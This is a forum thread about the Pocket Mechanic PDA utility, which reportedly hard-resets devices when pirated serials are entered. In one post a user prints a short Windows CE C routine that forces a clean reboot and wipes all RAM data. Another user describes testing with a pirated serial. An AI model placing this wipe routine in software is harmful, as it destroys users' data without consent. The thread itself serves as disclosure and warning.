Pocket Mechanic contains malicious code!

[TadW]

After reading this thread at Aximsite where users complain about hard resets invoked by Pocket Mechanic I thought to shed some light on Anton Tomov's crude ways of dealing with software pirates.

I understand that Tomov is upset about people using illegal codes for his software. But does this give him the right to forcefully wipe-out someone's PDA? Isn't that highly illegal as well?

That's right. Use a pirated or blacklisted serial with Pocket Mechanic, Pocket Mechanic will detect it, and send your PDA with all its lovely content to Nirvana land. I don't know what Tomov is thinking, but I can only recommend everyone do not buy any of his products. What if a bug sneaks into his code enabling his hardreset routine even if you are a legal buyer? Who is going to pay for your damages? Mr. Tomov, would that be you?

Technicals:
The hardreset routine Tomov uses looks like the following:

Code:

#include <windows.h>
#include <winioctl.h>
#define IOCTL_HAL_REBOOT CTL_CODE(FILE_DEVICE_HAL, 15, METHOD_BUFFERED, FILE_ANY_ACCESS)
extern "C" __declspec(dllimport)void SetCleanRebootFlag(void);
extern "C" __declspec(dllimport) BOOL KernelIoControl(
	DWORD dwIoControlCode,
	LPVOID lpInBuf,
	DWORD nInBufSize,
	LPVOID lpOutBuf,
	DWORD nOutBufSize,
	LPDWORD lpBytesReturned);

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
	LPTSTR lpCmdLine, int nCmdShow)
{
	SetCleanRebootFlag();
	KernelIoControl(IOCTL_HAL_REBOOT, NULL, 0, NULL, 0, NULL);

	return 0;
}

Perhaps someone should write a small utility that traps calls to KernelIoControl when the IOCTL_HAL_REBOOT flag is set. I cannot understand why Microsoft makes it so easy for virus programmers and people like Tomov to hard reset someone's PDA.

[Alexander Turcic]

Are you serious about that, Tad? That *really* stinks!

Edit: Looks this is exactly what happened to some poor people over at Aximsite. I'll put this thread to the frontpage.

[spinosum]

Thanks for warning!!! I was actually shopping for some Tomov's products this morning. So now i better just forget about buying his products. And also to warn a few of my friends too!!

[cheshire]

Thanks for the warning TadW, I won't be looking at Tomov's products from now, and will warn my friends about this also.

While registered users have nothing to fear, putting users' data at risk of programing bugs is in my opinion akin to hijacking their PDAs.

[Laurens]

These kind of measures only scare away prospective customers. Hopefully, the author will come to realize this.

A better way of dealing with piracy is to let the app display a bogus error message every now and then. This way you can separate the pirates from the customers when a user asks for support.

[Skibum]

Thanks for the tip Tad!

[Chaos]

That sort of behaviour kinda makes me sick... It's unethical and unnecessary.

Enter one character wrong as a serial number, and you may end up resetting your PPC... And another scary thought is, look at that small amount of code! Around 20 lines of code, and boom... Hard reset. Shouldn't Microsoft make it a LITTLE harder for a program to hard-reset a device?! (But then again, this comes from the same company who made ActiveX, which, in theory, can wipe a hard drive...)

[Alexander Turcic]

Quote:

Originally Posted by Chaos

And another scary thought is, look at that small amount of code! Around 20 lines of code, and boom... Hard reset. Shouldn't Microsoft make it a LITTLE harder for a program to hard-reset a device?!

ABSOLUTELY! And Tad already spoke about it in the last paragraph... I also have some Win32 programming knowledge, and I know it would be trivial on desktop Windows to hook one of the two relevant API functions via GetProcAddress and then to put your own lines of code to it (e.g. sanity checks to prevent hard-resets). Not sure if that is possible in WinCE though. Suggestions?

[Colin Dunstan]

Tough crap. I wonder if the developer is coming to his senses and removing this code asap.

[jkendrick]

Has anyone verified that this s/w indeed has this code in it?

[ortaliz]

Maybe we can get the point of view of the developer so that he can state his case.

[Alexander Turcic]

I contacted Mr Tomov and am awaiting his answer.

[Alexander Turcic]

I removed Tad's technical analysis (post #11) from this thread. If you want to hear my opinion, follow this thread.

[TadW]

Quote:

Originally Posted by Alexander

I removed Tad's technical analysis (post #11) from this thread. If you want to hear my opinion, follow this thread.

Sounds good! Note that the hard-reset snippet I posted is a known security risk which can be used by any software, worm, virus, etc. to hard-reset a PPC. I would not have posted it if it hadn't been made public already, here and here.

[JStein]

For what it's worth, I googled for a serial number, found one on a nasty site for 1.49. I then

- tried 1.49 with this serial. It didn't bomb.
- installed 1.50 which was mentioned in this thread and installed it over 1.49.
- when I clicked on the icon to start PM, my device did a reset and all data in RAM was lost.

Of course, since this was just an experiment, I did a full backup first, so I wasn't hurt. Notice that Tomov silently released 1.51 in the meantime (no mentioning in the changelog), and I haven't tried if the bomb is still in this updated version.